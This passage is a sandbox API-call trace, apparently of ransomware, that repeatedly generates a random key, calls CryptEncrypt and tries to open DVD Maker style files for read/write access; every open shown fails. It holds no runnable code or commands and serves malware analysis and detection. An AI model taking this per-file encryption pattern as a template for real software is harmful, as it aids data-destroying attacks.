0xffffffff [0092.476] GetProcessHeap () returned 0x2c0000 [0092.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.476] GetProcessHeap () returned 0x2c0000 [0092.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0092.476] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb70 | out: pbBuffer=0x270fb70) returned 1 [0092.476] GetProcessHeap () returned 0x2c0000 [0092.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.476] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb68*=0x30) returned 1 [0092.476] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.477] GetProcessHeap () returned 0x2c0000 [0092.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.477] GetProcessHeap () returned 0x2c0000 [0092.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.477] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb70 | out: pbBuffer=0x270fb70) returned 1 [0092.477] GetProcessHeap () returned 0x2c0000 [0092.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.477] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb68*=0x30) returned 1 [0092.477] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.478] GetProcessHeap () returned 0x2c0000 [0092.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.478] GetProcessHeap () returned 0x2c0000 [0092.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346c68 | out: hHeap=0x2c0000) returned 1 [0092.478] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb68 | out: pbBuffer=0x270fb68) returned 1 [0092.478] GetProcessHeap () returned 0x2c0000 [0092.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.478] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb60*=0x30) returned 1 [0092.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.478] GetProcessHeap () returned 0x2c0000 [0092.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.478] GetProcessHeap () returned 0x2c0000 [0092.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e638 | out: hHeap=0x2c0000) returned 1 [0092.478] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb68 | out: pbBuffer=0x270fb68) returned 1 [0092.478] GetProcessHeap () returned 0x2c0000 [0092.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.478] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb60*=0x30) returned 1 [0092.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.479] GetProcessHeap () returned 0x2c0000 [0092.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.479] GetProcessHeap () returned 0x2c0000 [0092.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f8c8 | out: hHeap=0x2c0000) returned 1 [0092.479] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb60 | out: pbBuffer=0x270fb60) returned 1 [0092.479] GetProcessHeap () returned 0x2c0000 [0092.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.479] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb58*=0x30) returned 1 [0092.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.479] GetProcessHeap () returned 0x2c0000 [0092.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.479] GetProcessHeap () returned 0x2c0000 [0092.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378730 | out: hHeap=0x2c0000) returned 1 [0092.479] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb60 | out: pbBuffer=0x270fb60) returned 1 [0092.479] GetProcessHeap () returned 0x2c0000 [0092.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.479] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb58*=0x30) returned 1 [0092.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.480] GetProcessHeap () returned 0x2c0000 [0092.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.480] GetProcessHeap () returned 0x2c0000 [0092.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f7d8 | out: hHeap=0x2c0000) returned 1 [0092.480] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb58 | out: pbBuffer=0x270fb58) returned 1 [0092.480] GetProcessHeap () returned 0x2c0000 [0092.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.481] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb50*=0x30) returned 1 [0092.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.481] GetProcessHeap () returned 0x2c0000 [0092.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.481] GetProcessHeap () returned 0x2c0000 [0092.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378648 | out: hHeap=0x2c0000) returned 1 [0092.481] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb58 | out: pbBuffer=0x270fb58) returned 1 [0092.481] GetProcessHeap () returned 0x2c0000 [0092.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.481] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb50*=0x30) returned 1 [0092.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.481] GetProcessHeap () returned 0x2c0000 [0092.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.481] GetProcessHeap () returned 0x2c0000 [0092.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355790 | out: hHeap=0x2c0000) returned 1 [0092.481] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb50 | out: pbBuffer=0x270fb50) returned 1 [0092.481] GetProcessHeap () returned 0x2c0000 [0092.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.482] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb48*=0x30) returned 1 [0092.482] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.482] GetProcessHeap () returned 0x2c0000 [0092.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.482] GetProcessHeap () returned 0x2c0000 [0092.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f6e8 | out: hHeap=0x2c0000) returned 1 [0092.482] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb50 | out: pbBuffer=0x270fb50) returned 1 [0092.482] GetProcessHeap () returned 0x2c0000 [0092.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.482] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb48*=0x30) returned 1 [0092.482] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.483] GetProcessHeap () returned 0x2c0000 [0092.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.483] GetProcessHeap () returned 0x2c0000 [0092.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0092.483] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb48 | out: pbBuffer=0x270fb48) returned 1 [0092.483] GetProcessHeap () returned 0x2c0000 [0092.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.483] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb40*=0x30) returned 1 [0092.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.483] GetProcessHeap () returned 0x2c0000 [0092.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.483] GetProcessHeap () returned 0x2c0000 [0092.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378560 | out: hHeap=0x2c0000) returned 1 [0092.484] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb48 | out: pbBuffer=0x270fb48) returned 1 [0092.484] GetProcessHeap () returned 0x2c0000 [0092.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.484] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb40*=0x30) returned 1 [0092.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.484] GetProcessHeap () returned 0x2c0000 [0092.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.484] GetProcessHeap () returned 0x2c0000 [0092.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378478 | out: hHeap=0x2c0000) returned 1 [0092.484] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb40 | out: pbBuffer=0x270fb40) returned 1 [0092.484] GetProcessHeap () returned 0x2c0000 [0092.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.484] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb38*=0x30) returned 1 [0092.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\chapters-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.484] GetProcessHeap () returned 0x2c0000 [0092.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.484] GetProcessHeap () returned 0x2c0000 [0092.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378390 | out: hHeap=0x2c0000) returned 1 [0092.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb40 | out: pbBuffer=0x270fb40) returned 1 [0092.485] GetProcessHeap () returned 0x2c0000 [0092.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.485] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb38*=0x30) returned 1 [0092.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.485] GetProcessHeap () returned 0x2c0000 [0092.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.485] GetProcessHeap () returned 0x2c0000 [0092.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0092.486] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb38 | out: pbBuffer=0x270fb38) returned 1 [0092.486] GetProcessHeap () returned 0x2c0000 [0092.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.486] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb30*=0x30) returned 1 [0092.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.486] GetProcessHeap () returned 0x2c0000 [0092.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.486] GetProcessHeap () returned 0x2c0000 [0092.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f5f8 | out: hHeap=0x2c0000) returned 1 [0092.486] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb38 | out: pbBuffer=0x270fb38) returned 1 [0092.486] GetProcessHeap () returned 0x2c0000 [0092.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.486] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb30*=0x30) returned 1 [0092.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.486] GetProcessHeap () returned 0x2c0000 [0092.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.486] GetProcessHeap () returned 0x2c0000 [0092.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0092.487] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb30 | out: pbBuffer=0x270fb30) returned 1 [0092.487] GetProcessHeap () returned 0x2c0000 [0092.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.487] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb28*=0x30) returned 1 [0092.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.487] GetProcessHeap () returned 0x2c0000 [0092.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.487] GetProcessHeap () returned 0x2c0000 [0092.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0092.487] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb30 | out: pbBuffer=0x270fb30) returned 1 [0092.487] GetProcessHeap () returned 0x2c0000 [0092.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.487] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb28*=0x30) returned 1 [0092.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.489] GetProcessHeap () returned 0x2c0000 [0092.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.490] GetProcessHeap () returned 0x2c0000 [0092.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x2c0000) returned 1 [0092.490] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb28 | out: pbBuffer=0x270fb28) returned 1 [0092.490] GetProcessHeap () returned 0x2c0000 [0092.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb20*=0x30) returned 1 [0092.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.490] GetProcessHeap () returned 0x2c0000 [0092.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.490] GetProcessHeap () returned 0x2c0000 [0092.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f418 | out: hHeap=0x2c0000) returned 1 [0092.490] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb28 | out: pbBuffer=0x270fb28) returned 1 [0092.490] GetProcessHeap () returned 0x2c0000 [0092.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb20*=0x30) returned 1 [0092.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.491] GetProcessHeap () returned 0x2c0000 [0092.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.491] GetProcessHeap () returned 0x2c0000 [0092.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0092.491] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb20 | out: pbBuffer=0x270fb20) returned 1 [0092.491] GetProcessHeap () returned 0x2c0000 [0092.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.491] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb18*=0x30) returned 1 [0092.491] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.491] GetProcessHeap () returned 0x2c0000 [0092.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.491] GetProcessHeap () returned 0x2c0000 [0092.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0092.491] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb20 | out: pbBuffer=0x270fb20) returned 1 [0092.491] GetProcessHeap () returned 0x2c0000 [0092.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.491] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, 